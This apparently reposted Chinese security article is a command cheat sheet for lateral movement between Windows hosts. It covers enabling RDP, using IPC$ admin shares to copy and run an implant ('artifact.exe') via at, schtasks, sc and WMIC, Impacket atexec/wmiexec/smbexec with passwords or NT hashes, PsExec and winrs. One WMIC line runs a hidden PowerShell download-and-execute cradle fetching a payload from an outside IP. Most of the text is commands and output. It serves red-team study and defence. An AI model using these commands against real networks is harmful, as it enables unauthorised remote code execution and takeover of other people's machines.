一、 RDP 连接
C:UsersAdministrator>reg query "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server
fDenyTSConnections REG_DWORD 0x0
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000001 /f
C:UsersAdministrator>tasklist /svc | findstr TermService
svchost.exe 1308 TermService
C:UsersAdministrator>netstat -ano | findstr 1308
TCP 0.0.0.0:43389 0.0.0.0:0 LISTENING 1308
TCP [::]:43389 [::]:0 LISTENING 1308
UDP 0.0.0.0:43389 *:* 1308
UDP [::]:43389 *:* 1308
二、 IPC$
-
开放了139、445端口;IPC$可以实现远程登陆,以及对默认共享资源的访问。开放139端口表示NetBIOS已经应用。通过139、445端口可以对共享文件和打印机的访问。
-
目标开启文件共享;默认共享是开启了的,包括所有逻辑盘(C、D、E)和系统目录winnt或者windows(admin),可以使用net share 查看
C:UsersAdministrator>net share
共享名 资源 注解
-------------------------------------------------------------------------------
C$ C: 默认共享
D$ D: 默认共享
E$ E: 默认共享
IPC$ 远程 IPC
ADMIN$ C:WINDOWS 远程管理
C:UsersAdministrator>net use \192.168.111.7 /u:"administrator" "密码"
命令成功完成。
C:UsersAdministrator>net use
会记录新的网络连接。
状态 本地 远程 网络
-------------------------------------------------------------------------------
OK \192.168.111.7IPC$ Microsoft Windows Network
命令成功完成。
C:UsersAdministrator>dir \192.168.111.7C$
驱动器 \192.168.111.7C$ 中的卷没有标签。
卷的序列号是 2CB2-AB58
\192.168.111.7C$ 的目录
2009/07/14 11:20 <DIR> PerfLogs
2017/08/28 12:15 <DIR> Program Files
2017/08/28 12:16 <DIR> Program Files (x86)
2017/08/27 03:41 <DIR> Users
2017/08/28 12:19 <DIR> Windows
C:>copy artifact.exe \192.168.111.7c$
已复制 1 个文件。
C:>net time \192.168.111.7
\192.168.111.7 的当前时间是 2022/3/17 17:55:25
命令成功完成。
C:>at \192.168.111.7 17:57:00 c:artifact.exe
AT 命令已弃用。请改用 schtasks.exe。
新加了一项作业,其作业 ID = 1
at \192.168.111.7 1 /delete
schtasks /create /s 192.168.111.7 /tn test /sc MINUTE /tr c:artifact.exe /ru system /f #创建定时任务
schtasks /delete /s 192.168.111.7 /tn "test" /f #删除定时任务
sc \192.168.111.7 create test binpath= "c:artifact.exe" #创建服务
sc \192.168.111.7 start test #启动服务
sc \192.168.111.7 delete test #删除服务
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python2 -m pip install .
➜ examples python atexec.py administrator:密码@192.168.111.7 whoami
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task BhFkYJtJ
[*] Running task BhFkYJtJ
[*] Deleting task BhFkYJtJ
[*] Attempting to read ADMIN$TempBhFkYJtJ.tmp
[*] Attempting to read ADMIN$TempBhFkYJtJ.tmp
nt authoritysystem
PsExec.exe -accepteula \192.168.111.7 -s cmd.exe
PsExec.exe \192.168.111.7 -u Administrator -p 密码 cmd.exe
三、 WMIC
wmic /node:IP地址 /user:用户名 /password:密码 WMIC命令
wmic USERACCOUNT list brief
wmic USERACCOUNT get /? #/?查看get能操作的参数
wmic USERACCOUNT get domain,name,caption
wmic USERACCOUNT where name="Administrator" get domain,name,caption # where条件查询获取制定参数
wmic process list brief #列出所有进程
wmic process get name,executablepath #获取所有进程名称以及可执行路径
wmic process where name="artifact.exe" get executablepath #获取指定进程可执行路径
wmic process call create "c:artifact.exe" #创建新进程
wmic process call create "shutdown.exe -r -f -t 60" #根据命令创建进程
wmic process where name="artifact.exe" delete #根据进程名称删除进程
wmic process where pid="3241" delete #根据PID删除进程
wmic service list brief
wmic SERVICE where name="test" call delete #删除test服务
wmic SHARE list brief #查询共享
WMIC SHARE CALL Create "","test","3","TestShareName","","c:test",0 #创建共享
wmic share where "name='TestShareName'" call delete #删除共享
wmic os get name,version,BuildNumber,SystemDirectory #查询目标系统相关信息
wmic PRODUCT get name,version #查看安装的软件
wmic STARTUP list brief #查询开机启动项
wmic qfe get Caption,Description,HotFixID,InstalledOn #查询系统中所安装的补丁
wmic FSDIR where "drive='c:' and filename='php'" get name #查找c盘下名为php的目录
wmic onboarddevice list brief #判断目标系统是否为虚拟机
wmic rdtoggle list #查看是否开启远程桌面 0代表关闭,1代表开启
wmic job list brief #计划任务
wmic /node:192.168.111.7 /user:administrator /password:密码 process call create "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.88.14.114:80/a'))""
➜ examples python2 wmiexec.py administrator:密码@192.168.111.7
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:>whoami
desktop-4r3s9dqadministrator
python2 wmiexec.py [email protected] -hashes LM Hash:NT Hash
wmiexec.exe administrator:密码@192.168.111.7
wmiexec.exe [email protected] -hashes LM Hash:NT Hash
四、 smbexec
-
需要开启 c$共享
-
开启445端口
➜ examples python smbexec.py administrator:密码@192.168.111.7
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:WINDOWSsystem32>whoami
nt authoritysystem
五、 WinRM
winrm quickconfig -q 或 winrm qc
C:UsersAdministrator> netsh http show servicestate
HTTP 服务状态快照(服务器会话视图):
-----------------------------------------------------
服务器会话 ID: FF00000620000001
版本: 2.0
状态: Active
属性:
最大带宽: 4294967295
超时:
实体正文超时(秒): 120
耗尽实体正文超时(秒): 120
请求队列超时(秒): 120
空闲连接超时(秒): 120
标头等待超时(秒): 120
最小发送速率(字节/秒): 150
URL 组:
URL 组 ID: FE00000640000001
状态: Active
请求队列名称: 请求队列尚未命名。
属性:
最大带宽: 已继承
最大连接数: 已继承
超时:
继承的超时值
已注册的 URL 数目: 1
已注册的 URL 数目:
HTTP://*:5357/48432E7F-DA05-472B-A381-4D8C20C117D4/
服务器会话 ID: FF00000520000001
版本: 1.0
状态: Active
属性:
最大带宽: 4294967295
超时:
实体正文超时(秒): 120
耗尽实体正文超时(秒): 120
请求队列超时(秒): 120
空闲连接超时(秒): 120
标头等待超时(秒): 120
最小发送速率(字节/秒): 150
URL 组:
URL 组 ID: FE00000540000001
状态: Active
请求队列名称: 请求队列尚未命名。
属性:
最大带宽: 已继承
最大连接数: 已继承
超时:
继承的超时值
已注册的 URL 数目: 2
已注册的 URL 数目:
HTTP://+:5985/WSMAN/
HTTP://+:47001/WSMAN/
请求队列:
请求队列名称: 请求队列尚未命名。
版本: 2.0
状态: Active
请求队列 503 详细级别: 基本
最大请求数目: 1000
附加活动进程数目: 1
进程 ID:
3396
请求队列名称: 请求队列尚未命名。
版本: 1.0
状态: Active
请求队列 503 详细级别: 基本
最大请求数目: 1000
附加活动进程数目: 1
进程 ID:
9312
winrs -r:http://192.168.111.7:5985 -u:administrator -p:密码 cmd
winrs -r:http://192.168.111.7:5985 -u:administrator -p:密码 whoami
点个在看你最好看
原文始发于微信公众号(山石网科安全技术研究院):横向渗透之Windows连接技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论